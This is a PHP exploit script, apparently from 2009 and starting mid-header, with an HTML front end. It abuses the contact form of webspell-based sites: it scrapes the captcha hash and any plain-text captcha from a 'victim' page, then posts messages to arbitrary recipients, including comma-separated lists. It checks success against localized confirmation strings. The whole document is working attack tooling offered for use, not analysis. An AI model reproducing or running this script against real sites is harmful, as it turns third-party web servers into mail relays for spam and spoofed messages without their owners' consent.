* | Date: Tue, 13 Oct 2009 13:13:09 +0200 */ $phase = isset($_GET['phase']) ? intval($_GET['phase']) : 0x0; switch($phase) { case 0x0: break; case 0x1: $url = isset($_POST['url']) ? $_POST['url'] : false; $info = parse_url($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, false); // we simulate that we are an firefox ... but hey the script // gives a shit who we are ... so change how you like curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent; Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3', 'Accept-Encoding: gzip,deflate', 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive: 300', 'Connection: keep-alive', )); $content = curl_exec($ch); curl_close($ch); if(isset($info['path'])) { $path = substr($info['path'], 0, strrpos($info['path'], '/')); } else { $path = ''; } $base_url = $info['scheme'] . '://' . $info['host'] . $path; if($content !== false) { // find captcha hash (dont include the header in the // result because else you get the session hash) $hash_matches = array(); preg_match('/([a-zA-Z0-9]{32})\.jpg/', $content, $hash_matches); if(!empty($hash_matches)) { $hash = substr(current($hash_matches), 0, -4); } else { trigger_error('doesnt look like an contact page'); } // some pages doesnt have an captcha protection ... instead // they write the code in plain text thats cool for us ... $captcha_matches = array(); preg_match('/([0-9]{5})<\/td>/', $content, $captcha_matches); if(!empty($captcha_matches)) { $quest = strip_tags(current($captcha_matches)); $captcha = strip_tags(current($captcha_matches)); } else { // they use probably an image captcha located at // tmp/[hash].jpg ... if they use another file ext // or folder simply changes this $quest = '

'; $captcha = ''; } } else { echo curl_error($ch); exit; } break; case 0x2: $fields = array( 'action' => 'send', 'getemail' => $_POST['getemail'], 'name' => $_POST['name'], 'from' => $_POST['from'], 'subject' => $_POST['subject'], 'captcha' => $_POST['captcha'], 'captcha_hash' => $_POST['captcha_hash'], 'text' => wordwrap(str_replace(array("\r\n", "\r"), "\n", $_POST['text']), 70), ); $post = array(); foreach($fields as $k => $v) { $post[] = $k . '=' . urlencode($v); } $postfields = implode('&', $post); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_POST['url']); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); curl_setopt($ch, CURLOPT_HEADER, true); // if someone implements a refer check against the exploit .. // only for fun xD curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Referer: ' . $_POST['url'], //'Cookie: ' . $_POST['cookie'], )); ob_start(); curl_exec($ch); curl_close($ch); $content = ob_get_contents(); ob_end_clean(); $matches = array(); // we search for a success message to indicate // whether the mail was successful send $success_msgs = array( 'Tvoje zpráva byla úspešne odeslána', 'Deine Nachricht wurde erfolgreich versandt', 'Din besked blev sent', 'Su noticia era expedida', 'Votre message a été envoyé avec succčs', 'Vaša poruka je uspješno poslana', 'Az üzenetedet sikeresen elküldted', 'Il tuo messaggio č stato inviato con successo', 'Jusu žinute buvo sekmingai išsiusta', 'Je bericht is succesvol verzonden', 'Your message was send successfully', 'Wiadomosc wyslana pomyslnie', 'A sua mensagem foi enviada com sucesso', 'Ditt meddlande blev framgĺngsrikt skickat', 'Vaša správa bola odoslaná', ); $success = false; foreach($success_msgs as $msg) { if(strpos($content, $msg) !== false) { $success = true; break; } } break; } ?>



	
	


	The url to the contact form that you want use to send an email


	Example:
	http://www.webspell.org/index.php?site=contact


	Victim:



	
	


	As receiver you can enter any email you like also a comma seperated list of emails


	Receiver:
	


	Name:
	


	From:
	


	Subject:
	


	Challenge:
	


	Captcha:
	


	Captcha hash:
	


	Text:
	some text



	
	


	Success*:
	


	Response:
	<?php echo htmlspecialchars($content); ?>


	* The success is based on the success message of the victims page. If the success is false you could analyze the html code to find the reason.

The url to the contact form that you want use to send an email
Example:	http://www.webspell.org/index.php?site=contact
Victim:

As receiver you can enter any email you like also a comma seperated list of emails
Receiver:
Name:
From:
Subject:
Challenge:
Captcha:
Captcha hash:
Text:	some text

Success*:
Response:	<?php echo htmlspecialchars($content); ?>
* The success is based on the success message of the victims page. If the success is false you could analyze the html code to find the reason.